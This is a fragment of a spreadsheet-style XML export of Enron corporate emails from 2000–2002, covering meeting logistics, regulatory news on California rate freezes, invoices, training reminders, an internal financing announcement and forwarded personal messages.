_x000D_
Enclosures: 139328v3_x000D_
  139328vR3/2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 2Z$803!.DOC_x000D_
 - 2Z$8RED.DOC_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 02:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>i think so.  one of the guys seems to know her.</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 15:36:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jozef.lieskovsky@enron.com', 'dipak.agarwalla@enron.com', 'bart.burk@enron.com', "justin.o'malley@enron.com", 'patrick.tucker@enron.com', 'adam.bayer@enron.com', 'chris.gaskill@enron.com', 'biliana.pehlivanova@enron.com', 'virawan.yawapongsiri@enron.com'})</t>
  </si>
  <si>
    <t>New Power Point template</t>
  </si>
  <si>
    <t xml:space="preserve">Hi everybody,_x000D_
_x000D_
Here is the new slide template. It is reduced in size and also has more space available for information._x000D_
_x000D_
Dipak, Justin and Patrick, please make sure that you don't link to the data, your files were the biggest in size._x000D_
_x000D_
Vladi_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 05:12:33 -0800 (PST)</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 13:20:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: 2002 Plan Lay Review Run Through</t>
  </si>
  <si>
    <t>Not before you scheduled the meeting.   Only as a result of it._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Tuesday, October 23, 2001 3:20 PM_x000D_
To:	Hayslett, Rod_x000D_
Subject:	RE: 2002 Plan Lay Review Run Through_x000D_
_x000D_
I heard its been canceled._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayslett, Rod  _x000D_
Sent:	Tuesday, October 23, 2001 3:20 PM_x000D_
To:	Geaccone, Tracy_x000D_
Subject:	RE: 2002 Plan Lay Review Run Through_x000D_
_x000D_
Too bad I can't be there.    I have a staff meeting to run._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Tuesday, October 23, 2001 2:55 PM_x000D_
To:	Harris, Steven; Neubauer, Dave; Hayes, Robert; Gadd, Eric; Miller, Mary Kay; Kilmer III, Robert_x000D_
Cc:	McCarty, Danny; Armstrong, Julie; Robertson, Audrey; Kovalcik, Tammy; Wadle, Susan; Keiser, John; Gilbert, Steve; Hayslett, Rod_x000D_
Subject:	FW: 2002 Plan Lay Review Run Through_x000D_
Importance:	High_x000D_
_x000D_
This meeting has been moved to Friday, October 26 from 9:00-11:00 in EB 42C2, Omaha Room 696._x000D_
_x000D_
Thanks_x000D_
_x000D_
Tracy_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Monday, October 22, 2001 1:07 PM_x000D_
To:	Harris, Steven; Neubauer, Dave; Hayes, Robert; Gadd, Eric; Miller, Mary Kay; Kilmer III, Robert_x000D_
Cc:	McCarty, Danny; Armstrong, Julie; Robertson, Audrey; Kovalcik, Tammy; Wadle, Susan; Keiser, John; Gilbert, Steve_x000D_
Subject:	2002 Plan Lay Review Run Through_x000D_
_x000D_
Please plan to attend a run through with Danny of your 2002 Plan Presentations for the Lay Reviews on Thursday, October 25 from 9:00-11:00 in 42C2.  For Omaha room 696._x000D_
_x000D_
Thanks_x000D_
_x000D_
Tracy</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 11:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>OU Candidates</t>
  </si>
  <si>
    <t>Sally,_x000D_
_x000D_
I just left a message with Chris Hanz and Steve Stock who are both Sr. _x000D_
Directors under Beth Perlman.  Given the office visit schedules - Chris and _x000D_
Steve will likely only be available at the following times:_x000D_
_x000D_
Chris to meet with Chris Hoyle  After 10:30 a.m._x000D_
Steve to meet with John Rodgers From 1:00 p.m. - 1:30 p.m._x000D_
_x000D_
_x000D_
I will let you know as soon as I hear from them and confirm._x000D_
_x000D_
Thanks,_x000D_
Ashley_x000D_
33589</t>
  </si>
  <si>
    <t>Team Leader Mtg. Conference room EB4102</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Team Leader Mtg. Conference room EB4102_x000D_
_x000D_
Date:		7/24/2001_x000D_
Time:		2:30 PM - 3:30 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 01:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shawna.flynn@enron.com', 'tana.jones@enron.com', 'gerald.nemec@enron.com', 'dan.lyons@enron.com', 'sara.shackleton@enron.com', 'carol.clair@enron.com', 'julia.murray@enron.com', 'jason.peters@enron.com', 'susan.bailey@enron.com', 'brent.hendry@enron.com', 'barbara.gray@enron.com', 'robert.bruce@enron.com', 'samantha.boyd@enron.com', 'shonnie.daniel@enron.com', 'mary.cook@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Music in the Morning  FYI</t>
  </si>
  <si>
    <t>JUST FOR FUN!_x000D_
_x000D_
I have recently discovered some great morning traffic music on KPFT 90.1 on a _x000D_
show called "Mary in the Morning."  I wish it were me, but it must be another _x000D_
Mary who likes fun music too, such as Dance the Night Away by the Mavericks!  _x000D_
Anyway, it is a fun way to get in the Enron Mood in the morning!_x000D_
_x000D_
_x000D_
_x000D_
Enron North America Corp._x000D_
Mary Cook_x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas   77002-7361_x000D_
(713) 345-7732 (phone)_x000D_
(713) 646-3490 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 08:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'harry.kingerski@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Ominous Turn at CPUC</t>
  </si>
  <si>
    <t>In lay speak, the new alternative decision looks like it could lead to a very _x000D_
quick end to the rate freeze and the associated PX Credit.  Roger's _x000D_
suggesting sometime in the 1st Quarter 2001_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 12/13/2000 04:38 PM -----_x000D_
_x000D_
	Roger Yang@EES_x000D_
	12/13/2000 03:35 PM_x000D_
		 _x000D_
		 To: Scott Stoness/HOU/EES@EES, Dennis Benevides, James W Lewis/HOU/EES@EES, _x000D_
Gordon Savage/HOU/EES@EES_x000D_
		 cc: Paul Kaufman/PDX/ECT@ECT, Richard Shapiro/NA/Enron@Enron, Jeff _x000D_
Dasovich/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON, Harry _x000D_
Kingerski/NA/Enron@Enron_x000D_
		 Subject: _x000D_
_x000D_
The CPUC Meeting agenda changed the following item to read as follow:_x000D_
_x000D_
_x000D_
_x000D_
A99-01-016 - Pacific Gas and Electric Company (PG&amp;E)._x000D_
                                                For authority to establish _x000D_
post-transition period electric ratemaking mechanisms._x000D_
                                                A.99-01-019, A.99-01-034, _x000D_
A.99-02-029, A.00-10-028 - Related matters. This_x000D_
                                                decision addresses the _x000D_
extraordinary financial situation facing PG&amp;E and Edison_x000D_
                                                as a result of current _x000D_
problems in the wholesale electric market and includes an_x000D_
                                                assessment of accounting _x000D_
changes and adjustments previously proposed in this_x000D_
                                                proceeding. Simultaneously, _x000D_
the Commission will expedite its review of market_x000D_
                                                valuation proceedings to _x000D_
determine the feasibility of lifting the rate freeze as_x000D_
                                                expeditiously as possible, _x000D_
and to evaluate the need for reasonable rate increases._x000D_
_x000D_
Previously, this item read as follows:_x000D_
_x000D_
"The decision denies the emergency petitions to modify D99-10-057 and D..... _x000D_
filed by PG&amp;E and SCE on October 4, 2000._x000D_
The decision adopts the accounting changes proposed by TURN as a first step _x000D_
in assessing the impacts of electric restructuing_x000D_
on cost recovery.The Commission will continue to monitor the impact on the _x000D_
utilities in future phases of this proceeding or successor_x000D_
proceedings."_x000D_
_x000D_
There is an all party meeting at the CPUC on the proposed decision for next _x000D_
Tuesday.  I have to think that the rate freeze will end no later than the end _x000D_
of Q1 2001._x000D_
This is when the utilities' cash is expected to run out, as well as the _x000D_
latest there would be a final valuation decision._x000D_
_x000D_
We need to discuss._x000D_
_x000D_
Roger</t>
  </si>
  <si>
    <t>Thu, 14 Feb 2002 06:57:32 -0800 (PST)</t>
  </si>
  <si>
    <t>FW:  Enron Voice Mail System</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Armstrong, Julie  _x000D_
Sent:	Wednesday, February 13, 2002 4:18 PM_x000D_
To:	McConnell, Mark; Hyatt, Kevin; Lindberg, Lorraine; Lohman, TK; Gadd, Eric; McCarty, Danny_x000D_
Subject:	 Enron Voice Mail System_x000D_
_x000D_
This was forwarded to me and it is funny._x000D_
 - WitCity The Enron Voice Mail System 2002.htm </t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 03:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Children's Museum - Golf Tournament 1/2 day @ Memorial Park. Tammy_x000D_
 Kahn 713/522-1138 x-211</t>
  </si>
  <si>
    <t xml:space="preserve">Memorial park noon - end.  Trying to raise about 90K, </t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 04:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'jody.pierce@enron.com', 'ben.jacoby@enron.com', 'matthew.tezyk@enron.com', 'chris.booth@enron.com', 'dan.shultz@enron.com'})</t>
  </si>
  <si>
    <t>Blue Dog Max (GE 7EA) storage invoice and Change Order</t>
  </si>
  <si>
    <t>Please advise how to respond to GE.  Kay has the change order for final _x000D_
review and approval, and Jody Pierce's group has the invoice._x000D_
_x000D_
----- Forwarded by Brian D Barto/ENRON_DEVELOPMENT on 03/23/2001 12:21 PM _x000D_
-----_x000D_
_x000D_
	jeffrey.darst@ps.ge.com_x000D_
	03/23/2001 10:58 AM_x000D_
		 _x000D_
		 To: bbarto@enron.com, matthew.tezyk@enron.com_x000D_
		 cc: gary.chapman@ps.ge.com, sharon.torre@ps.ge.com, john.schroeder@ps.ge.com_x000D_
		 Subject: Blue Dog Max storage_x000D_
_x000D_
_x000D_
Attached is a copy of the invoice that we issued for the storage of Unit #1._x000D_
This invoice has not been paid.  I believe you are waiting for the signing_x000D_
of the contract change order.  Neither of us expected this process to take_x000D_
this long._x000D_
_x000D_
As we have an agreement that the equipment will be stored, and we agree on_x000D_
the price of the storage, I am requesting that this invoice be paid_x000D_
immediately._x000D_
_x000D_
_x000D_
&gt;  &lt;&lt;Blue Dog N01G8299.xls&gt;&gt;_x000D_
&gt;_x000D_
Thank You,_x000D_
_x000D_
Jeff_x000D_
Global Power Plant Systems_x000D_
518-385-0663_x000D_
518-381-1513 (fax)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Blue Dog N01G8299.xls</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 04:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ellen.wallumrod@enron.com', 'lametrice.dopson@enron.com', 'wesley.wilder@enron.com', 'bob.menefee@enron.com', 'linda.bryan@enron.com', 'linda.ng@enron.com', 'sarah.bruck@enron.com', 'jia.chen@enron.com', 'martha.braddy@enron.com', 'franky.sulistio@enron.com', 'amudha.moorthy@enron.com', 'sally.craig@enron.com', 'ryan.herchenbach@enron.com', 'lindon.chiu@enron.com', 'beau.harrison@enron.com', 'anita.luong@enron.com', 'mike.millwee@enron.com', 'imelda.trevino@enron.com', 'melia.dickson@enron.com', 'alex.wong@enron.com', 'kevin.jordan@enron.com', 'stuart.donaldson@enron.com', 'kay.mann@enron.com', 'kathie.grabstald@enron.com', 'ceci.twachtman@enron.com', 'kristen.clause@enron.com'})</t>
  </si>
  <si>
    <t>Course Enrollment</t>
  </si>
  <si>
    <t xml:space="preserve">REMINDER!!!!!_x000D_
_x000D_
_x000D_
You are enrolled in the following._x000D_
_x000D_
What:  Basics of Risk Management_x000D_
When: June 21 &amp; 22, 2001_x000D_
Where:  EB552_x000D_
Time:   8:00 am - 5:00 pm (1st day)_x000D_
  8:00 am - noon   (2nd day)_x000D_
_x000D_
If your scheduled has changed and you cannot attend, please cancel yourself _x000D_
or let me know.  Also, I have 4 spots open for tomorrows sessionm if you _x000D_
intersted, let me know immediately._x000D_
_x000D_
Gracie_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Feb 2002 07:01:07 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Lunch on Monday</t>
  </si>
  <si>
    <t>Met sounds good_x000D_
_x000D_
-----Original Message-----_x000D_
From: Winters, Ricki _x000D_
Sent: Monday, February 11, 2002 6:24 AM_x000D_
To: Corman, Shelley_x000D_
Subject: RE: Lunch on Monday_x000D_
_x000D_
_x000D_
Janice told me that he would be in the office today.  Would The Met be OK?_x000D_
_x000D_
Thanks, Ricki_x000D_
_x000D_
-----Original Message-----_x000D_
From: Corman, Shelley _x000D_
Sent: Friday, February 08, 2002 4:32 PM_x000D_
To: Winters, Ricki_x000D_
Subject: Re: Lunch on Monday_x000D_
_x000D_
_x000D_
Somewhere convenient to Jim since he has to come from Beltway/EOTT.  Will he come down Wetheimer?  If so we can meet at Highland Village - Grotto is it?  Or if he comes down I-10n then ??_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 08:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'beatrice.reyna@enron.com'})</t>
  </si>
  <si>
    <t>Re: Nat Gas Basis Options</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry Beatrice,_x000D_
_x000D_
I sent this to Greg and forgot to send it to you as well.  This is a _x000D_
preliminary file until I have the official NGI settle prices for Chicago City _x000D_
Gate and Socal.  Let me know it you have any questions._x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Beatrice Reyna@ENRON_x000D_
12/04/2000 04:39 PM_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Nat Gas Basis Options  _x000D_
_x000D_
Hi Susan,_x000D_
_x000D_
Would you please forward the current spreadsheet with exotics?_x000D_
_x000D_
Thanks, _x000D_
Beatrice_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 02:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: orig</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Errol McLaughlin/Corp/Enron on 05/02/2001 _x000D_
09:55 AM ---------------------------_x000D_
From: Bradley Jones/ENRON@enronXgate on 05/02/2001 01:08 AM_x000D_
To: Errol McLaughlin/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: FW: orig_x000D_
_x000D_
errol, _x000D_
I caught one more of the same deal._x000D_
_x000D_
The cells are p23 and q23._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Jones, Brad  _x000D_
Sent: Wednesday, May 02, 2001 1:05 AM_x000D_
To: McLaughlin, Errol_x000D_
Subject: orig_x000D_
_x000D_
Errol,_x000D_
I noticed a small mistake late last night.  Their is West orig on your Orig _x000D_
schedule that is not 0.  It is already on the west schedule so the value just _x000D_
needs to be taken off your orig schedule tab.  _x000D_
_x000D_
The cells that need to be set = to 0 are p41 and q41_x000D_
_x000D_
thanks,_x000D_
brad_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 09:15:23 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
Today we announced another positive development in our efforts to regain shareholder and market confidence, strengthen our balance sheet and help maintain our credit rating._x000D_
_x000D_
We have executed a commitment letter with two of our longstanding banking partners, JPMorgan (the investment banking arm of JPMorgan Chase &amp; Co.) and Salomon Smith Barney (the investment banking arm of Citigroup Inc.), that will provide us with additional secured credit lines worth $1 billion.  Our Northern Natural Gas Company and Transwestern Pipeline Company will support these assets.  The proceeds will be used to supplement short-term liquidity and to refinance maturing obligations._x000D_
_x000D_
The pipelines are not being sold.  Enron is only using these assets for this new credit line.  Secured financing like this provides an expeditious way to increase liquidity and restore confidence.  We also have the capacity to increase this facility by an additional $200 million if we bring in additional banks to participate._x000D_
_x000D_
This money is in addition to the $3 billion in our credit lines we accessed last week to pay off short-term commercial debt and keep more than $1 billion in cash._x000D_
_x000D_
I know it is discouraging to read the negative media coverage about our company.  On a positive note, there was an editorial in last Sunday's Houston Chronicle that I want you to read:  &lt;http://www.chron.com/cs/CDA/story.hts/editorial/outlook/1107504&gt;.  This is an extremely difficult time for everyone and I appreciate everything you do for Enron._x000D_
_x000D_
Don't forget to read our voice mail and e-mail transcripts covering these developments on the Enron Updates intranet site at (&lt;http://home.enron.com/updates/&gt;)._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Wed, 1 Aug 2001 16:04:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>Southeast RTO draft affidavit</t>
  </si>
  <si>
    <t xml:space="preserve">FYI, I haven't reviewed yet.  Also, I told Andrea to not do anything on this.  We can decide how we want to use it._x000D_
---------------------- Forwarded by Christi L Nicolay/HOU/ECT on 08/01/2001 06:03 PM ---------------------------_x000D_
_x000D_
_x000D_
"Cardell, Judith" &lt;jcardell@tca-us.com&gt; on 08/01/2001 12:26:49 PM_x000D_
To:	"'Christi.L.Nicolay@enron.com'" &lt;Christi.L.Nicolay@enron.com&gt;_x000D_
cc:	"Tabors, Richard" &lt;rtabors@tca-us.com&gt;, "Cardell, Judith" &lt;jcardell@tca-us.com&gt; _x000D_
_x000D_
Subject:	Southeast RTO draft affidavit_x000D_
_x000D_
_x000D_
Hi Christi,_x000D_
_x000D_
Here's the draft of the affidavit, which I have sent to Andrea Settanni as_x000D_
well, to review.  The analysis has two sections 1) historical trading data_x000D_
in the southeast, and 2)a power flow analysis of 61 different transactions_x000D_
to examine parallel flows.  We found that for all types of transactions_x000D_
there are extensive parallel flows throughout the southeast (Grid South,_x000D_
Southern Company, Grid Florida, and Entergy), including TVA and SPP as well._x000D_
SPP seems to be as tightly tied to MAPP as to Entergy and SoCo, so could go_x000D_
either way (i.e. with the Southeast or with the Midwest)._x000D_
_x000D_
In addition to significant parallel flows throughout, my analysis of the_x000D_
trade data showed quite a bit of marketer activity (both marketers such as_x000D_
Enron and Coral... and also marketing affiliates of transmission providers)._x000D_
To me this says that a large RTO is required because marketers are clearly_x000D_
important participants in the electricity markets in the southeast, and they_x000D_
do not confine themselves to small areas. The regions will need consistent_x000D_
trading and market rules if strong competitive markets are to develop and_x000D_
continue to allow the expansion of trade._x000D_
_x000D_
This draft should become a final version once Andrea has had a chance to_x000D_
check the content and format.  Please let me know if this affidavit_x000D_
addresses your questions, or if you want to have any additional questions_x000D_
analyzed._x000D_
_x000D_
Thank you,_x000D_
Judy_x000D_
_x000D_
 &lt;&lt;affidavit draft 2.wpd&gt;&gt;  &lt;&lt;Exhibit JBC-62 SE Map.pdf&gt;&gt;  &lt;&lt;Exhibits JBC-1_x000D_
to 61.pdf&gt;&gt;_x000D_
_x000D_
___________________________x000D_
Judith Cardell, Ph.D._x000D_
Senior Associate_x000D_
Tabors, Caramanis &amp; Associates_x000D_
50 Church St. Cambridge MA 02138_x000D_
ph: 617-354-5304; fax: 617-354-5882_x000D_
www.tca-us.com_x000D_
_x000D_
_x000D_
 - affidavit draft 2.wpd _x000D_
 - Exhibit JBC-62 SE Map.pdf _x000D_
 - Exhibits JBC-1 to 61.pdf _x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Jul 2001 06:59:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'keith.holst@enron.com', 'mike.grigsby@enron.com', 'matt.smith@enron.com'})</t>
  </si>
  <si>
    <t>FW: Meet your New Analyst(s)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Davis, Karen  _x000D_
Sent:	Monday, July 23, 2001 1:03 PM_x000D_
Cc:	Jones, Donna; Walt, John; Coleman, Jacqueline; Bland Jr., Ted C.; Friesenhahn, Shelly_x000D_
Subject:	Meet your New Analyst(s)_x000D_
_x000D_
Meet your Analyst(s) tomorrow, Tuesday 24th at 3:00 pm in the Energizer. _x000D_
_x000D_
In preparation for your Analyst(s) start date on Thursday, please pick them up at the Energizer and take them to your Business Unit for Introductions and overview of your area. If you can not meet with your Analyst(s), please send someone from your Business Unit in your place. Following introductions to your area, the Analyst(s) are free to leave for the day. _x000D_
_x000D_
If you have any questions/concerns, please contact John Walt ext. 3-5379 or Donna Jones ext. 3-3175.</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 16:33:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rcstokes@ckt.net'})</t>
  </si>
  <si>
    <t>Re: enron golf balls</t>
  </si>
  <si>
    <t>Craig Stokes_x000D_
124 N. Broadway St._x000D_
Franklin Ks._x000D_
66735_x000D_
Thanks Craig_x000D_
_x000D_
Phillip.M.Love@enron.com wrote:_x000D_
_x000D_
&gt; give me your mailing address and I will get those golf balls in the mail._x000D_
&gt; Thanks._x000D_
&gt; PL_x000D_
&gt;_x000D_
&gt;     -----Original Message-----_x000D_
&gt;    From:   Robert Craig Stokes &lt;rcstokes@ckt.net&gt;@ENRON_x000D_
&gt;    Sent:   Tuesday, January 22, 2002 1:06 PM_x000D_
&gt;    To:     Love, Phillip M._x000D_
&gt;    Subject:  enron golf balls_x000D_
&gt;_x000D_
&gt;    I made payment by paypal._x000D_
&gt;    Thanks Craig_x000D_
&gt;_x000D_
&gt; **********************************************************************_x000D_
&gt; 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_x000D_
&gt; **********************************************************************</t>
  </si>
  <si>
    <t>Thu, 10 Feb 2000 07:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Happy Hour to Welcome Jody Crook</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 02/10/2000 03:42 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Yvette G Connevey @ ENRON                           02/10/2000 09:59 AM_x000D_
	_x000D_
_x000D_
To: Michael Walters/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT, O'Neal D _x000D_
Winfree/HOU/ECT@ECT, Bryan Hull/HOU/ECT@ECT, David Baumbach/HOU/ECT@ECT, _x000D_
Phillip M Love/HOU/ECT@ECT, Chad Landry/HOU/ECT@ECT, Timothy _x000D_
Blanchard/HOU/EES@EES, Shanna Husser/Corp/Enron@Enron, Brenda F _x000D_
Herod/HOU/ECT@ECT_x000D_
cc: Steve Venturatos/HOU/ECT@ECT _x000D_
Subject: Happy Hour to Welcome Jody Crook_x000D_
_x000D_
You are invited to Happy Hour this evening to help Steve Venturatos welcome _x000D_
Jody Crook, a new Analyst, to the Regulatory Compliance group.  We will be _x000D_
meeting at the State Bar, 909 Texas, around 5:30.   Feel free to extend the _x000D_
invitation!!_x000D_
_x000D_
See ya there!_x000D_
_x000D_
Yvette_x000D_
x3.5953 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 06:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.cernosek@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'denver.plachy@enron.com', 'jennifer.bagwell@enron.com', 'jason.wolfe@enron.com', 'andres.balmaceda@enron.com', 'luchas.johnson@enron.com', 'jeff.royed@enron.com', 'phillip.love@enron.com', 'victor.guggenheim@enron.com', 'william.kelly@enron.com', 'jody.crook@enron.com', 'kyle.lilly@enron.com', 'chris.walker@enron.com'})</t>
  </si>
  <si>
    <t>DPR/GL Adjustments</t>
  </si>
  <si>
    <t>Please plan on adjusting your PL for the following amount during the month of _x000D_
November..._x000D_
_x000D_
_x000D_
Frank</t>
  </si>
  <si>
    <t>Fri, 30 Nov 2001 15:28:29 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Action Requested:  Past Due Invoice for User: LAWRENCE CAMPBELL</t>
  </si>
  <si>
    <t>Bill, I have this outstanding bill notice which I keep getting form iPayit.  There are about 5 invoices from Argent for EOTT work which they did in 2001. It was for the Midland EOTT compliance stuff. I dont know how to let the system know that these invoices have been taken care of.  Is there someone you know of who can let iPayit know that these invoices have been taken care of?   _x000D_
_x000D_
-----Original Message-----_x000D_
From: iPayit _x000D_
Sent: Thursday, November 29, 2001 6:07 PM_x000D_
To: Campbell, Larry_x000D_
Subject: Action Requested: Past Due Invoice for User: LAWRENCE CAMPBELL_x000D_
Importance: High_x000D_
_x000D_
_x000D_
Alert!  _x000D_
You are receiving this message because you have an unresolved invoice in your iPayit in-box that is past due.  It is critical that you login to iPayit and take immediate action to resolve this invoice. _x000D_
_x000D_
Remember, you play an important role in ensuring that we pay our vendors on time. _x000D_
_x000D_
Tip!:  You must login to the system to forward this invoice to another user. _x000D_
_x000D_
To launch iPayit, click on the link below:_x000D_
http://iPayit.enron.com_x000D_
Note:  Your iPayit User ID and Password are your eHRonline/SAP Personnel ID and Password._x000D_
_x000D_
First time iPayit user?  For training materials, click on the link below:_x000D_
http://isc.enron.com/site/doclibrary/user/default.asp_x000D_
_x000D_
Need help?_x000D_
North America: ISC Call Center at (713) 345-4727._x000D_
Europe: European Accounts Payable at +44-20-7783-7520._x000D_
Asia-Pacific: Sydney Accounts Payable at +61-2-9229-2336</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 05:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: A SERIOUS MEXICAN BIRTHDAY PARTY!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Rudy Acevedo/HOU/ECT on 05/16/2001 12:04 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Brenda A. Salinas" &lt;menachuchena@hotmail.com&gt; on 05/16/2001 11:59:11 AM_x000D_
To: rudy.acevedo@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Fwd: A SERIOUS MEXICAN BIRTHDAY PARTY!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
THIS IS TOO FUNNY !!!!_x000D_
? ENJOY !!!_x000D_
_x000D_
B-_x000D_
_x000D_
&gt;Subject: Fwd: A SERIOUS MEXICAN BIRTHDAY PARTY!  _x000D_
&gt;Date: Wed, 16 May 2001 11:54:52 EDT  _x000D_
&gt;  _x000D_
&gt;  _x000D_
_x000D_
_x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com_x000D_
_x000D_
Return-path: &lt;JRiceprod@aol.com&gt;_x000D_
From: JRiceprod@aol.com_x000D_
Full-name: JRiceprod_x000D_
Message-ID: &lt;4d.bbe0abc.283345f6@aol.com&gt;_x000D_
Date: Tue, 15 May 2001 22:54:46 EDT_x000D_
Subject: Fwd: A SERIOUS MEXICAN BIRTHDAY PARTY!_x000D_
To: Cheryl.Arguijo@enron.com, hunchbackluv@hotmail.com, brackeenjr@yahoo.com, _x000D_
roland.hernandez@exxon.sprint.com, GrandeRGV@aol.com, mgarcia@e-aquifer.com, _x000D_
cornelius_shirley@dao.co.harris.tx.us, upon16@yahoo.com, _x000D_
rue.ramirez@mail.utexas.edu, jrice@khou.com, JTamm1215@aol.com, _x000D_
larrystuever@yahoo.com, jason.ward@nhmccd.edu_x000D_
MIME-Version: 1.0_x000D_
Content-Type:  multipart/mixed; boundary="part2_3e.bce6099.283345f6_boundary"_x000D_
X-Mailer: AOL 5.0 for Windows sub 138_x000D_
_x000D_
_x000D_
_x000D_
Return-Path: &lt;lquintal@amwpc.com&gt;_x000D_
Received: from  rly-zc02.mx.aol.com (rly-zc02.mail.aol.com [172.31.33.2]) by _x000D_
air-zc04.mail.aol.com (v78.38) with ESMTP; Mon, 14 May 2001 10:14:24 -0400_x000D_
Received: from  mail1.pcm.net (pcm.net [207.91.150.11]) by _x000D_
rly-zc02.mx.aol.com (v77_r1.36) with ESMTP; Mon, 14 May 2001 10:14:11 2000_x000D_
Received: from LETECIA [209.140.43.74] by mail1.pcm.net  (SMTPD32-6.05) id _x000D_
AA39E49A0396; Mon, 14 May 2001 09:22:49 -0500_x000D_
Message-ID: &lt;003001c0dc80$5a60ecc0$4a2b8cd1@PCM.NET&gt;_x000D_
From: &lt;lquintal@amwpc.com&gt;_x000D_
To: "Quintal, Joe" &lt;Joe.Quintal@cityofhouston.net&gt;_x000D_
Cc: "Nancy Villarreal" &lt;nvillarreal@plummerlawyers.com&gt;,        "Tessa Diaz" _x000D_
&lt;tessa.f.diaz@exxon.com&gt;,        "Miguel Diaz" _x000D_
&lt;Miguel.Diaz@puffer.com&gt;,        "Martha Sainz" &lt;Martha_Sainz@agfg.com&gt;,      _x000D_
  "Mary Francis Perez" &lt;mperez@aglife.com&gt;,        "Cindi Garcia" _x000D_
&lt;CINDI.GARCIA@chase.com&gt;,        "Pat Garcia" &lt;pgarcia103@aol.com&gt;,        _x000D_
"Judy Jozwiak" &lt;antjoz@worldnet.att.net&gt;,        "Laura Rice" _x000D_
&lt;JRiceprod@aol.com&gt;, "Pam Banks" &lt;pebanks@mindspring.com&gt;,        "Neila _x000D_
Fernandes" &lt;mceend@hotmail.com&gt;,        "Hamilton, Erin" _x000D_
&lt;ehamilton@fna.com&gt;,        "Jaramillo, Angelica" _x000D_
&lt;Angelica.Jaramillo@COMPAQ.com&gt;_x000D_
Subject: RE:  A SERIOUS MEXICAN BIRTHDAY PARTY!_x000D_
Date: Mon, 14 May 2001 09:15:36 -0500_x000D_
MIME-Version: 1.0_x000D_
Content-Type:  multipart/alternative; _x000D_
boundary="----=_NextPart_000_002D_01C0DC56.6FD67E00"_x000D_
X-Priority: 3_x000D_
